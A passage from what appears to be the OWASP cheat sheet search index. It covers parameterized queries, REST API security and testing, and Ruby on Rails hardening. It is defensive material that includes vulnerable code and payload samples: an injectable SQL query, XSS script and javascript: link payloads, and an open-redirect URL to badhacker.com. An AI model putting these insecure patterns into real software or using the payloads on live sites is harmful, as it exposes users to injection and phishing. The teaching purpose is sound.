"},{"location":"cheatsheets/Query_Parameterization_Cheat_Sheet.html#using-php-with-php-data-objects","title":"Using PHP with PHP Data Objects","text":"
$stmt = $dbh->prepare(\"INSERT INTO REGISTRY (name, value) VALUES (:name, :value)\");\n$stmt->bindParam(':name', $name);\n$stmt->bindParam(':value', $value);\n
"},{"location":"cheatsheets/Query_Parameterization_Cheat_Sheet.html#using-cold-fusion-built-in-feature","title":"Using Cold Fusion built-in feature","text":"
<cfquery name = \"getFirst\" dataSource = \"cfsnippets\">\n    SELECT * FROM #strDatabasePrefix#_courses WHERE intCourseID =\n    <cfqueryparam value = #intCourseID# CFSQLType = \"CF_SQL_INTEGER\">\n</cfquery>\n
"},{"location":"cheatsheets/Query_Parameterization_Cheat_Sheet.html#using-perl-with-database-independent-interface","title":"Using PERL with Database Independent Interface","text":"
my $sql = \"INSERT INTO foo (bar, baz) VALUES ( ?, ? )\";\nmy $sth = $dbh->prepare( $sql );\n$sth->execute( $bar, $baz );\n
"},{"location":"cheatsheets/Query_Parameterization_Cheat_Sheet.html#using-rust-with-sqlx","title":"Using Rust with SQLx","text":"
// Input from CLI args but could be anything\nlet username = std::env::args().last().unwrap();\n\n// Using built-in macros (compile time checks)\nlet users = sqlx::query_as!(\nUser,\n\"SELECT * FROM users WHERE name = ?\",\nusername\n)\n.fetch_all(&pool)\n.await\n.unwrap();\n\n// Using built-in functions\nlet users: Vec<User> = sqlx::query_as::<_, User>(\n\"SELECT * FROM users WHERE name = ?\"\n)\n.bind(&username)\n.fetch_all(&pool)\n.await\n.unwrap();\n
"},{"location":"cheatsheets/Query_Parameterization_Cheat_Sheet.html#stored-procedure-examples","title":"Stored Procedure Examples","text":"

The SQL you write in your web application isn't the only place that SQL injection vulnerabilities can be introduced. If you are using Stored Procedures, and you are dynamically constructing SQL inside them, you can also introduce SQL injection vulnerabilities.

Dynamic SQL can be parameterized using bind variables, to ensure the dynamically constructed SQL is secure.

Here are some examples of using bind variables in stored procedures in different databases.

"},{"location":"cheatsheets/Query_Parameterization_Cheat_Sheet.html#oracle-using-plsql","title":"Oracle using PL/SQL","text":""},{"location":"cheatsheets/Query_Parameterization_Cheat_Sheet.html#normal-stored-procedure","title":"Normal Stored Procedure","text":"

No dynamic SQL being created. Parameters passed in to stored procedures are naturally bound to their location within the query without anything special being required:

PROCEDURE SafeGetBalanceQuery(UserID varchar, Dept varchar) AS BEGIN\nSELECT balance FROM accounts_table WHERE user_ID = UserID AND department = Dept;\nEND;\n
"},{"location":"cheatsheets/Query_Parameterization_Cheat_Sheet.html#stored-procedure-using-bind-variables-in-sql-run-with-execute","title":"Stored Procedure Using Bind Variables in SQL Run with EXECUTE","text":"

Bind variables are used to tell the database that the inputs to this dynamic SQL are 'data' and not possibly code:

PROCEDURE AnotherSafeGetBalanceQuery(UserID varchar, Dept varchar)\nAS stmt VARCHAR(400); result NUMBER;\nBEGIN\nstmt := 'SELECT balance FROM accounts_table WHERE user_ID = :1\n            AND department = :2';\nEXECUTE IMMEDIATE stmt INTO result USING UserID, Dept;\nRETURN result;\nEND;\n
"},{"location":"cheatsheets/Query_Parameterization_Cheat_Sheet.html#sql-server-using-transact-sql","title":"SQL Server using Transact-SQL","text":""},{"location":"cheatsheets/Query_Parameterization_Cheat_Sheet.html#normal-stored-procedure_1","title":"Normal Stored Procedure","text":"

No dynamic SQL being created. Parameters passed in to stored procedures are naturally bound to their location within the query without anything special being required:

PROCEDURE SafeGetBalanceQuery(@UserID varchar(20), @Dept varchar(10)) AS BEGIN\nSELECT balance FROM accounts_table WHERE user_ID = @UserID AND department = @Dept\nEND\n
"},{"location":"cheatsheets/Query_Parameterization_Cheat_Sheet.html#stored-procedure-using-bind-variables-in-sql-run-with-exec","title":"Stored Procedure Using Bind Variables in SQL Run with EXEC","text":"

Bind variables are used to tell the database that the inputs to this dynamic SQL are 'data' and not possibly code:

PROCEDURE SafeGetBalanceQuery(@UserID varchar(20), @Dept varchar(10)) AS BEGIN\nDECLARE @sql VARCHAR(200)\nSELECT @sql = 'SELECT balance FROM accounts_table WHERE '\n+ 'user_ID = @UID AND department = @DPT'\nEXEC sp_executesql @sql,\n'@UID VARCHAR(20), @DPT VARCHAR(10)',\n@UID=@UserID, @DPT=@Dept\nEND\n
"},{"location":"cheatsheets/Query_Parameterization_Cheat_Sheet.html#references","title":"References","text":""},{"location":"cheatsheets/REST_Assessment_Cheat_Sheet.html","title":"REST Assessment Cheat Sheet","text":""},{"location":"cheatsheets/REST_Assessment_Cheat_Sheet.html#about-restful-web-services","title":"About RESTful Web Services","text":"

Web Services are an implementation of web technology used for machine-to-machine communication. As such they are used for inter-application communication, Web 2.0 and mashups, and by desktop and mobile applications to call a server.

RESTful web services (often called simply REST) are a lightweight variant of Web Services based on the RESTful design pattern. In practice, RESTful web services utilize HTTP requests that are similar to regular HTTP calls, in contrast with other Web Services technologies such as SOAP, which utilizes a complex protocol.

"},{"location":"cheatsheets/REST_Assessment_Cheat_Sheet.html#key-relevant-properties-of-restful-web-services","title":"Key relevant properties of RESTful web services","text":""},{"location":"cheatsheets/REST_Assessment_Cheat_Sheet.html#the-challenge-of-security-testing-restful-web-services","title":"The challenge of security testing RESTful web services","text":""},{"location":"cheatsheets/REST_Assessment_Cheat_Sheet.html#how-to-pentest-a-restful-web-service","title":"How to pentest a RESTful web service","text":"

Determine the attack surface through documentation - RESTful pen testing might be better off if some level of white box testing is allowed and you can get information about the service.

This information will ensure fuller coverage of the attack surface. Such information to look for:

Collect full requests using a proxy - while always an important pen testing step, this is more important for REST based applications as the application UI may not give clues on the actual attack surface.

Note that the proxy must be able to collect full requests and not just URLs as REST services utilize more than just GET parameters.

Analyze collected requests to determine the attack surface:

Verify non-standard parameters: in some cases (but not all), setting the value of a URL segment suspected of being a parameter to a value expected to be invalid can help determine whether it is a path element or a parameter. If it is a path element, the web server will return a 404 message, while for an invalid value of a parameter the answer would be an application-level message, as the value is legal at the web server level.

Analyzing collected requests to optimize fuzzing - after identifying potential parameters to fuzz, analyze the collected values for each to determine:

Lastly, when fuzzing, don't forget to emulate the authentication mechanism used.

"},{"location":"cheatsheets/REST_Assessment_Cheat_Sheet.html#related-resources","title":"Related Resources","text":""},{"location":"cheatsheets/REST_Security_Cheat_Sheet.html","title":"REST Security Cheat Sheet","text":""},{"location":"cheatsheets/REST_Security_Cheat_Sheet.html#introduction","title":"Introduction","text":"

REST (or REpresentational State Transfer) is an architectural style first described in Roy Fielding's Ph.D. dissertation on Architectural Styles and the Design of Network-based Software Architectures.

It evolved as Fielding wrote the HTTP/1.1 and URI specs and has been proven to be well-suited for developing distributed hypermedia applications. While REST is more widely applicable, it is most commonly used within the context of communicating with services via HTTP.

The key abstraction of information in REST is a resource. A REST API resource is identified by a URI, usually an HTTP URL. REST components use connectors to perform actions on a resource by using a representation to capture the current or intended state of the resource and transferring that representation.

The primary connector types are client and server; secondary connectors include cache, resolver and tunnel.

REST APIs are stateless. Stateful APIs do not adhere to the REST architectural style. State in the REST acronym refers to the state of the resource which the API accesses, not the state of a session within which the API is called. While there may be good reasons for building a stateful API, it is important to realize that managing sessions is complex and difficult to do securely.

Stateful services are out of scope of this Cheat Sheet: Passing state from client to backend, while making the service technically stateless, is an anti-pattern that should also be avoided as it is prone to replay and impersonation attacks.

In order to implement flows with REST APIs, resources are typically created, read, updated and deleted. For example, an ecommerce site may offer methods to create an empty shopping cart, to add items to the cart and to check out the cart. Each of these REST calls is stateless and the endpoint should check whether the caller is authorized to perform the requested operation.

Another key feature of REST applications is the use of standard HTTP verbs and error codes in the pursuit of removing unnecessary variation among different services.

Another key feature of REST applications is the use of HATEOAS or Hypermedia As The Engine of Application State. This gives REST applications a self-documenting nature, making it easier for developers to interact with a REST service without prior knowledge.

"},{"location":"cheatsheets/REST_Security_Cheat_Sheet.html#https","title":"HTTPS","text":"

Secure REST services must only provide HTTPS endpoints. This protects authentication credentials in transit, for example passwords, API keys or JSON Web Tokens. It also allows clients to authenticate the service and guarantees integrity of the transmitted data.

See the Transport Layer Protection Cheat Sheet for additional information.

Consider the use of mutually authenticated client-side certificates to provide additional protection for highly privileged web services.

"},{"location":"cheatsheets/REST_Security_Cheat_Sheet.html#access-control","title":"Access Control","text":"

Non-public REST services must perform access control at each API endpoint. Web services in monolithic applications implement this by means of user authentication, authorization logic and session management. This has several drawbacks for modern architectures which compose multiple microservices following the RESTful style.

"},{"location":"cheatsheets/REST_Security_Cheat_Sheet.html#jwt","title":"JWT","text":"

There seems to be a convergence towards using JSON Web Tokens (JWT) as the format for security tokens. JWTs are JSON data structures containing a set of claims that can be used for access control decisions. A cryptographic signature or message authentication code (MAC) can be used to protect the integrity of the JWT.

If MACs are used for integrity protection, every service that is able to validate JWTs can also create new JWTs using the same key. This means that all services using the same key have to mutually trust each other. Another consequence of this is that a compromise of any service also compromises all other services sharing the same key. See here for additional information.

The relying party or token consumer validates a JWT by verifying its integrity and the claims it contains.

Some claims have been standardized and should be present in JWTs used for access control. At least the following of the standard claims should be verified:

As JWTs contain details of the authenticated entity (user etc.), a disconnect can occur between the JWT and the current state of the user's session, for example, if the session is terminated earlier than the expiration time due to an explicit logout or an idle timeout. When an explicit session termination event occurs, a digest or hash of any associated JWTs should be submitted to a block list on the API which will invalidate that JWT for any requests until the expiration of the token. See the JSON_Web_Token_for_Java_Cheat_Sheet for further details.
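
For illustration, a hedged Java sketch using the auth0 java-jwt library (the library choice, issuer, audience, sharedSecret and token values are assumptions, not prescriptions); verify() checks the signature and the exp/nbf claims, and the require() builder pins the expected issuer and audience:

import com.auth0.jwt.JWT;\nimport com.auth0.jwt.JWTVerifier;\nimport com.auth0.jwt.algorithms.Algorithm;\nimport com.auth0.jwt.interfaces.DecodedJWT;\n\n// Placeholder issuer, audience and secret\nAlgorithm algorithm = Algorithm.HMAC256(sharedSecret);\nJWTVerifier verifier = JWT.require(algorithm)\n.withIssuer(\"https://idp.example.com\")\n.withAudience(\"https://api.example.com\")\n.acceptLeeway(1) // tolerate at most 1 second of clock skew\n.build();\n\n// Throws JWTVerificationException if the signature, issuer, audience or expiry is invalid\nDecodedJWT jwt = verifier.verify(token);\n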

"},{"location":"cheatsheets/REST_Security_Cheat_Sheet.html#api-keys","title":"API Keys","text":"

Public REST services without access control run the risk of being farmed, leading to excessive bills for bandwidth or compute cycles. API keys can be used to mitigate this risk. They are also often used by organisations to monetize APIs; instead of blocking high-frequency calls, clients are given access in accordance with a purchased access plan.

API keys can reduce the impact of denial-of-service attacks. However, when they are issued to third-party clients, they are relatively easy to compromise.

"},{"location":"cheatsheets/REST_Security_Cheat_Sheet.html#restrict-http-methods","title":"Restrict HTTP methods","text":"

In Java EE in particular, this can be difficult to implement properly. See Bypassing Web Authentication and Authorization with HTTP Verb Tampering for an explanation of this common misconfiguration.
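
As an illustrative sketch (the jakarta.servlet namespace and the allowed-method set are assumptions), a deny-by-default servlet filter can reject unexpected verbs before they reach any endpoint:

import jakarta.servlet.Filter;\nimport jakarta.servlet.FilterChain;\nimport jakarta.servlet.ServletException;\nimport jakarta.servlet.ServletRequest;\nimport jakarta.servlet.ServletResponse;\nimport jakarta.servlet.http.HttpServletRequest;\nimport jakarta.servlet.http.HttpServletResponse;\nimport java.io.IOException;\nimport java.util.Set;\n\npublic class AllowedMethodsFilter implements Filter {\n// Only the verbs the API actually uses\nprivate static final Set<String> ALLOWED = Set.of(\"GET\", \"POST\", \"PUT\", \"DELETE\");\n\n@Override\npublic void doFilter(ServletRequest req, ServletResponse res, FilterChain chain) throws IOException, ServletException {\nHttpServletRequest request = (HttpServletRequest) req;\nif (!ALLOWED.contains(request.getMethod())) {\n((HttpServletResponse) res).sendError(HttpServletResponse.SC_METHOD_NOT_ALLOWED);\nreturn;\n}\nchain.doFilter(req, res);\n}\n}\n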

"},{"location":"cheatsheets/REST_Security_Cheat_Sheet.html#input-validation","title":"Input validation","text":""},{"location":"cheatsheets/REST_Security_Cheat_Sheet.html#validate-content-types","title":"Validate content types","text":"

A REST request or response body should match the intended content type in the header. Otherwise this could cause misinterpretation at the consumer/producer side and lead to code injection/execution.
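
For example, with JAX-RS the accepted request and produced response content types can be declared per resource (a sketch; the resource path and Order payload type are placeholders), so a mismatched Content-Type is rejected with 415 and an unsupported Accept header with 406:

import jakarta.ws.rs.Consumes;\nimport jakarta.ws.rs.POST;\nimport jakarta.ws.rs.Path;\nimport jakarta.ws.rs.Produces;\nimport jakarta.ws.rs.core.MediaType;\n\n// Placeholder payload type\nrecord Order(String id, int quantity) {}\n\n@Path(\"/orders\")\npublic class OrderResource {\n\n@POST\n@Consumes(MediaType.APPLICATION_JSON) // non-JSON request bodies are rejected with 415\n@Produces(MediaType.APPLICATION_JSON) // responses are only ever serialized as JSON\npublic Order create(Order order) {\n// handle the validated, typed payload\nreturn order;\n}\n}\n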

"},{"location":"cheatsheets/REST_Security_Cheat_Sheet.html#validate-request-content-types","title":"Validate request content types","text":""},{"location":"cheatsheets/REST_Security_Cheat_Sheet.html#send-safe-response-content-types","title":"Send safe response content types","text":"

It is common for REST services to allow multiple response types (e.g. application/xml or application/json), and the client specifies the preferred order of response types by the Accept header in the request.

Services including script code (e.g. JavaScript) in their responses must be especially careful to defend against header injection attacks.

"},{"location":"cheatsheets/REST_Security_Cheat_Sheet.html#management-endpoints","title":"Management endpoints","text":""},{"location":"cheatsheets/REST_Security_Cheat_Sheet.html#error-handling","title":"Error handling","text":""},{"location":"cheatsheets/REST_Security_Cheat_Sheet.html#audit-logs","title":"Audit logs","text":""},{"location":"cheatsheets/REST_Security_Cheat_Sheet.html#security-headers","title":"Security Headers","text":"

There are a number of security related headers that can be returned in the HTTP responses to instruct browsers to act in specific ways. However, some of these headers are intended to be used with HTML responses, and as such may provide little or no security benefits on an API that does not return HTML.

The following headers should be included in all API responses:

Header | Rationale
Cache-Control: no-store | Prevent sensitive information from being cached.
Content-Security-Policy: frame-ancestors 'none' | To protect against drag-and-drop style clickjacking attacks.
Content-Type | To specify the content type of the response. This should be application/json for JSON responses.
Strict-Transport-Security | To require connections over HTTPS and to protect against spoofed certificates.
X-Content-Type-Options: nosniff | To prevent browsers from performing MIME sniffing, and inappropriately interpreting responses as HTML.
X-Frame-Options: DENY | To protect against drag-and-drop style clickjacking attacks.
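
A minimal servlet-filter sketch that applies these baseline headers to every API response (the jakarta.servlet namespace and the HSTS max-age value are assumptions; Content-Type is normally set per response by the framework):

import jakarta.servlet.Filter;\nimport jakarta.servlet.FilterChain;\nimport jakarta.servlet.ServletException;\nimport jakarta.servlet.ServletRequest;\nimport jakarta.servlet.ServletResponse;\nimport jakarta.servlet.http.HttpServletResponse;\nimport java.io.IOException;\n\npublic class ApiSecurityHeadersFilter implements Filter {\n@Override\npublic void doFilter(ServletRequest req, ServletResponse res, FilterChain chain) throws IOException, ServletException {\nHttpServletResponse response = (HttpServletResponse) res;\nresponse.setHeader(\"Cache-Control\", \"no-store\");\nresponse.setHeader(\"Content-Security-Policy\", \"frame-ancestors 'none'\");\nresponse.setHeader(\"Strict-Transport-Security\", \"max-age=31536000; includeSubDomains\");\nresponse.setHeader(\"X-Content-Type-Options\", \"nosniff\");\nresponse.setHeader(\"X-Frame-Options\", \"DENY\");\nchain.doFilter(req, res);\n}\n}\n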

The headers below are only intended to provide additional security when responses are rendered as HTML. As such, if the API will never return HTML in responses, then these headers may not be necessary. However, if there is any uncertainty about the function of the headers, or the types of information that the API returns (or may return in future), then it is recommended to include them as part of a defence-in-depth approach.

Header | Example | Rationale
Content-Security-Policy | Content-Security-Policy: default-src 'none' | The majority of CSP functionality only affects pages rendered as HTML.
Permissions-Policy | Permissions-Policy: accelerometer=(), ambient-light-sensor=(), autoplay=(), battery=(), camera=(), cross-origin-isolated=(), display-capture=(), document-domain=(), encrypted-media=(), execution-while-not-rendered=(), execution-while-out-of-viewport=(), fullscreen=(), geolocation=(), gyroscope=(), keyboard-map=(), magnetometer=(), microphone=(), midi=(), navigation-override=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), sync-xhr=(), usb=(), web-share=(), xr-spatial-tracking=() | This header used to be named Feature-Policy. When browsers heed this header, it is used to control browser features via directives. The example disables features with an empty allowlist for a number of permitted directive names. When you apply this header, verify that the directives are up-to-date and fit your needs. Please have a look at this article for a detailed explanation on how to control browser features.
Referrer-Policy | Referrer-Policy: no-referrer | Non-HTML responses should not trigger additional requests."},{"location":"cheatsheets/REST_Security_Cheat_Sheet.html#cors","title":"CORS","text":"

Cross-Origin Resource Sharing (CORS) is a W3C standard to flexibly specify what cross-domain requests are permitted. By delivering appropriate CORS Headers your REST API signals to the browser which domains, AKA origins, are allowed to make JavaScript calls to the REST service.
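
As a sketch of the allowlist idea (the origin values are placeholders, and request/response stand for the servlet request and response objects), the server should echo the Origin header back in Access-Control-Allow-Origin only when it appears in a known-good set, and never reflect arbitrary origins:

import java.util.Set;\n\n// Inside a filter or request handler; ALLOWED_ORIGINS is a placeholder allowlist\nSet<String> ALLOWED_ORIGINS = Set.of(\"https://app.example.com\", \"https://admin.example.com\");\n\nString origin = request.getHeader(\"Origin\");\nif (origin != null && ALLOWED_ORIGINS.contains(origin)) {\nresponse.setHeader(\"Access-Control-Allow-Origin\", origin);\nresponse.setHeader(\"Vary\", \"Origin\"); // keep caches from mixing up per-origin responses\n}\n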

"},{"location":"cheatsheets/REST_Security_Cheat_Sheet.html#sensitive-information-in-http-requests","title":"Sensitive information in HTTP requests","text":"

RESTful web services should be careful to prevent leaking credentials. Passwords, security tokens, and API keys should not appear in the URL, as URLs can be captured in web server logs, which makes the credentials intrinsically valuable.

OK:

https://example.com/resourceCollection/[ID]/action

https://twitter.com/vanderaj/lists

NOT OK:

https://example.com/controller/123/action?apiKey=a53f435643de32 because the API key is in the URL.

"},{"location":"cheatsheets/REST_Security_Cheat_Sheet.html#http-return-code","title":"HTTP Return Code","text":"

HTTP defines status codes. When designing a REST API, don't just use 200 for success or 404 for error. Always use the semantically appropriate status code for the response.

Here is a non-exhaustive selection of security related REST API status codes. Use it to ensure you return the correct code.

Code | Message | Description
200 | OK | Response to a successful REST API action. The HTTP method can be GET, POST, PUT, PATCH or DELETE.
201 | Created | The request has been fulfilled and the resource created. A URI for the created resource is returned in the Location header.
202 | Accepted | The request has been accepted for processing, but the processing is not yet complete.
301 | Moved Permanently | Permanent redirection.
304 | Not Modified | Caching-related response returned when the client has the same copy of the resource as the server.
307 | Temporary Redirect | Temporary redirection of the resource.
400 | Bad Request | The request is malformed, such as a message body format error.
401 | Unauthorized | Wrong or no authentication ID/password provided.
403 | Forbidden | Used when the authentication succeeded but the authenticated user doesn't have permission to access the requested resource.
404 | Not Found | When a non-existent resource is requested.
405 | Method Not Allowed | The error for an unexpected HTTP method. For example, the REST API is expecting HTTP GET, but HTTP PUT is used.
406 | Not Acceptable | The client presented a content type in the Accept header which is not supported by the server API.
413 | Payload Too Large | Use it to signal that the request size exceeded the given limit, e.g. regarding file uploads.
415 | Unsupported Media Type | The requested content type is not supported by the REST service.
429 | Too Many Requests | Used when a DoS attack may have been detected or the request is rejected due to rate limiting.
500 | Internal Server Error | An unexpected condition prevented the server from fulfilling the request. Be aware that the response should not reveal internal information that helps an attacker, e.g. detailed error messages or stack traces.
501 | Not Implemented | The REST service does not implement the requested operation yet.
503 | Service Unavailable | The REST service is temporarily unable to process the request. Used to inform the client it should retry at a later time.

Additional information about HTTP return code usage in REST API can be found here and here.

"},{"location":"cheatsheets/Ruby_on_Rails_Cheat_Sheet.html","title":"Ruby on Rails Cheat Sheet","text":""},{"location":"cheatsheets/Ruby_on_Rails_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This cheat sheet intends to provide quick, basic Ruby on Rails security tips for developers. It complements, augments or emphasizes points brought up in the Rails security guide from the Rails core team.

The Rails framework abstracts developers from quite a bit of tedious work and provides the means to accomplish complex tasks quickly and with ease. New developers, those unfamiliar with the inner-workings of Rails, likely need a basic set of guidelines to secure fundamental aspects of their application. The intended purpose of this doc is to be that guide.

"},{"location":"cheatsheets/Ruby_on_Rails_Cheat_Sheet.html#items","title":"Items","text":""},{"location":"cheatsheets/Ruby_on_Rails_Cheat_Sheet.html#command-injection","title":"Command Injection","text":"

Ruby offers a function called \"eval\" which will dynamically build new Ruby code based on Strings. It also has a number of ways to call system commands.

eval(\"ruby code here\")\nsystem(\"os command here\")\n`ls -al /` # (backticks contain os command)\nexec(\"os command here\")\nspawn(\"os command here\")\nopen(\"| os command here\")\nProcess.exec(\"os command here\")\nProcess.spawn(\"os command here\")\nIO.binread(\"| os command here\")\nIO.binwrite(\"| os command here\", \"foo\")\nIO.foreach(\"| os command here\") {}\nIO.popen(\"os command here\")\nIO.read(\"| os command here\")\nIO.readlines(\"| os command here\")\nIO.write(\"| os command here\", \"foo\")\n

While the power of these commands is quite useful, extreme care should be taken when using them in a Rails-based application. Usually, it's just a bad idea. If need be, an allow-list of possible values should be used and any input should be validated as thoroughly as possible.

The guides from Rails and OWASP contain further information on command injection.

"},{"location":"cheatsheets/Ruby_on_Rails_Cheat_Sheet.html#sql-injection","title":"SQL Injection","text":"

Ruby on Rails is often used with an ORM called ActiveRecord, though it is flexible and can be used with other data sources. Typically very simple Rails applications use methods on the Rails models to query data. Many use cases protect for SQL Injection out of the box. However, it is possible to write code that allows for SQL Injection.

name = params[:name]\n@projects = Project.where(\"name like '\" + name + \"'\");\n

The statement is injectable because the name parameter is not escaped.

Here is the idiom for building this kind of statement:

@projects = Project.where(\"name like ?\", \"%#{ActiveRecord::Base.sanitize_sql_like(params[:name])}%\")\n

Use caution not to build SQL statements based on user controlled input. A list of more realistic and detailed examples is here: rails-sqli.org. OWASP has extensive information about SQL Injection.

"},{"location":"cheatsheets/Ruby_on_Rails_Cheat_Sheet.html#cross-site-scripting-xss","title":"Cross-site Scripting (XSS)","text":"

By default, Rails provides protection against XSS: when string data is shown in views, it is escaped prior to being sent back to the browser. This goes a long way, but there are common cases where developers bypass this protection - for example to enable rich text editing. In the event that you want to pass variables to the front end with tags intact, it is tempting to do the following in your .erb file (Ruby markup).

# Wrong! Do not do this!\n<%= raw @product.name %>\n\n# Wrong! Do not do this!\n<%== @product.name %>\n\n# Wrong! Do not do this!\n<%= @product.name.html_safe %>\n\n# Wrong! Do not do this!\n<%= content_tag @product.name %>\n

Unfortunately, any field that uses raw, html_safe, content_tag or similar like this will be a potential XSS target. Note that there are also widespread misunderstandings about html_safe().

This writeup describes the underlying SafeBuffer mechanism in detail. Other tags that change the way strings are prepared for output can introduce similar issues, including content_tag.

content_tag(\"/><script>alert('hack!');</script>\") # XSS example\n# produces: </><script>alert('hack!');</script>><//><script>alert('hack!');</script>>\n

The method html_safe of String is somewhat confusingly named. It means that we know for sure the content of the string is safe to include in HTML without escaping. This method itself is unsafe!

If you must accept HTML content from users, consider a markup language for rich text in an application (examples include Markdown and Textile) and disallow HTML tags. This helps ensure that the input accepted doesn't include HTML content that could be malicious.

If you cannot restrict your users from entering HTML, consider implementing content security policy to disallow the execution of any JavaScript. And finally, consider using the #sanitize method that lets you list allowed tags. Be careful, this method has been shown to be flawed numerous times and will never be a complete solution.

An often overlooked XSS attack vector for older versions of Rails is the href value of a link:

<%= link_to \"Personal Website\", @user.website %>\n

If @user.website contains a link that starts with javascript:, the content will execute when a user clicks the generated link:

<a href=\"javascript:alert('Haxored')\">Personal Website</a>\n

Newer Rails versions escape such links in a better way.

link_to \"Personal Website\", 'javascript:alert(1);'.html_safe()\n# Will generate:\n# \"<a href=\"javascript:alert(1);\">Personal Website</a>\"\n

Using Content Security Policy is one more security measure to forbid execution for links starting with javascript: .

Brakeman scanner helps in finding XSS problems in Rails apps.

OWASP provides more general information about XSS in a top level page: Cross-site Scripting (XSS).

"},{"location":"cheatsheets/Ruby_on_Rails_Cheat_Sheet.html#sessions","title":"Sessions","text":"

By default, Ruby on Rails uses a cookie-based session store. What that means is that, unless you change something, the session will not expire on the server. That means that some default applications may be vulnerable to replay attacks. It also means that sensitive information should never be put in the session.

The best practice is to use a database-based session store, which thankfully is very easy with Rails:

Project::Application.config.session_store :active_record_store\n

There is a Session Management Cheat Sheet.

"},{"location":"cheatsheets/Ruby_on_Rails_Cheat_Sheet.html#authentication","title":"Authentication","text":"

As with all sensitive data, start securing your authentication by enabling TLS in your configuration:

# config/environments/production.rb\n# Force all access to the app over SSL, use Strict-Transport-Security,\n# and use secure cookies\nconfig.force_ssl = true\n

Uncomment the config.force_ssl = true line, as shown above, in your configuration.

Generally speaking, Rails does not provide authentication by itself. However, most developers using Rails leverage libraries such as Devise or AuthLogic to provide authentication.

To enable authentication it is possible to use the Devise gem.

Install it using:

gem 'devise'\n

Then install it to the user model:

rails generate devise:install\n

Next, specify which resources (routes) require authenticated access in routes:

Rails.application.routes.draw do\nauthenticate :user do\nresources :something do  # these resources require authentication\n...\nend\nend\n\ndevise_for :users # sign-up/-in/out routes\n\nroot to: 'static#home' # no authentication required\nend\n

To enforce password complexity, it is possible to use the zxcvbn gem. Configure your user model with it:

class User < ApplicationRecord\ndevise :database_authenticatable,\n# other devise features, then\n:zxcvbnable\nend\n

And configure the required password complexity:

# in config/initializers/devise.rb\nDevise.setup do |config|\n# zxcvbn score for devise\nconfig.min_password_score = 4 # complexity score here.\n...\n

You can try out this PoC to learn more about it.

Next, the omniauth gem allows for multiple strategies for authentication. Using it, one can configure secure authentication with Facebook, LDAP and many other providers. Read on here.

"},{"location":"cheatsheets/Ruby_on_Rails_Cheat_Sheet.html#token-authentication","title":"Token Authentication","text":"

Devise usually uses Cookies for authentication.

If token authentication is desired instead, it can be implemented with the devise_token_auth gem.

It supports multiple front end technologies, for example angular2-token.

This gem is configured similarly to the devise gem itself. It also requires omniauth as a dependency.

# token-based authentication\ngem 'devise_token_auth'\ngem 'omniauth'\n

Then a route is defined:

mount_devise_token_auth_for 'User', at: 'auth'\n

And the User model is modified accordingly.

These actions can be done with one command:

rails g devise_token_auth:install [USER_CLASS] [MOUNT_PATH]\n

You may need to edit the generated migration to avoid unnecessary fields and/or field duplication depending on your use case.

Note: when you use only token authentication, there is no longer any need for CSRF protection in controllers. If you use both mechanisms, cookies and tokens, the paths where cookies are used for authentication must still be protected from forgery!

There is an Authentication Cheat Sheet.

"},{"location":"cheatsheets/Ruby_on_Rails_Cheat_Sheet.html#insecure-direct-object-reference-or-forceful-browsing","title":"Insecure Direct Object Reference or Forceful Browsing","text":"

By default, Ruby on Rails apps use a RESTful URI structure. That means that paths are often intuitive and guessable. To protect against a user trying to access or modify data that belongs to another user, it is important to specifically control actions. Out of the gate on a vanilla Rails application, there is no such built-in protection. It is possible to do this by hand at the controller level.

It is also possible, and probably recommended, to consider resource-based access control libraries such as cancancan (the replacement for cancan) or pundit to do this. This ensures that all operations on a database object are authorized by the business logic of the application.

More general information about this class of vulnerability is in the OWASP Top 10 Page.

"},{"location":"cheatsheets/Ruby_on_Rails_Cheat_Sheet.html#csrf-cross-site-request-forgery","title":"CSRF (Cross Site Request Forgery)","text":"

Ruby on Rails has specific, built-in support for CSRF tokens. To enable it, or ensure that it is enabled, find the base ApplicationController and look for a directive such as the following:

class ApplicationController < ActionController::Base\nprotect_from_forgery\n

Note that the syntax for this type of control includes a way to add exceptions. Exceptions may be useful for APIs or other reasons - but should be reviewed and consciously included. In the example below, the Rails ProjectController will not provide CSRF protection for the show method.

class ProjectController < ApplicationController\nprotect_from_forgery except: :show\n

Also note that by default Rails does not provide CSRF protection for any HTTP GET request.

Note: if you use token authentication only, there is no need to protect from CSRF in controllers like this. If cookie-based authentication is used on some paths, then the protection is still required on those paths.

There is a top level OWASP page for Cross-Site Request Forgery (CSRF).

"},{"location":"cheatsheets/Ruby_on_Rails_Cheat_Sheet.html#redirects-and-forwards","title":"Redirects and Forwards","text":"

Web applications often require the ability to dynamically redirect users based on client-supplied data. To clarify, dynamic redirection usually entails the client including a URL in a parameter within a request to the application. Once received by the application, the user is redirected to the URL specified in the request.

For example:

http://www.example.com/redirect?url=http://www.example_commerce_site.com/checkout

The above request would redirect the user to http://www.example_commerce_site.com/checkout. The security concern associated with this functionality is leveraging an organization's trusted brand to phish users and trick them into visiting a malicious site, in our example, badhacker.com.

Example:

http://www.example.com/redirect?url=http://badhacker.com

The most basic, but restrictive protection is to use the :only_path option. Setting this to true will essentially strip out any host information. However, the :only_path option must be part of the first argument. If the first argument is not a hash table, then there is no way to pass in this option. In the absence of a custom helper or allow list, this is one approach that can work:

begin\nif path = URI.parse(params[:url]).path\nredirect_to path\nend\nrescue URI::InvalidURIError\nredirect_to '/'\nend\n

If matching user input against a list of approved sites or TLDs with regular expressions is a must, it makes sense to leverage a library such as URI.parse() to obtain the host, and then match the host value against regular expression patterns. Those regular expressions must, at a minimum, have anchors, or there is a greater chance of an attacker bypassing the validation routine.

Example:

require 'uri'\nhost = URI.parse(\"#{params[:url]}\").host\n# this can be vulnerable to javascript://trusted.com/%0Aalert(0)\n# so check .scheme and .port too\nvalidation_routine(host) if host\ndef validation_routine(host)\n# Validation routine where we use  \\A and \\z as anchors *not* ^ and $\n# you could also check the host value against an allow list\nend\n

Blindly redirecting to a user-supplied parameter can also lead to XSS.

Example code:

redirect_to params[:to]\n

Will give this URL:

http://example.com/redirect?to[status]=200&to[protocol]=javascript:alert(0)//

The obvious fix for this type of vulnerability is to restrict to specific Top-Level Domains (TLDs), statically define specific sites, or map a key to its value.

Example code:

ACCEPTABLE_URLS = {\n'our_app_1' => \"https://www.example_commerce_site.com/checkout\",\n'our_app_2' => \"https://www.example_user_site.com/change_settings\"\n}\n

Will give this URL:

http://www.example.com/redirect?url=our_app_1

Redirection handling code:

def redirect\nurl = ACCEPTABLE_URLS[\"#{params[:url]}\"]\nredirect_to url if url\nend\n

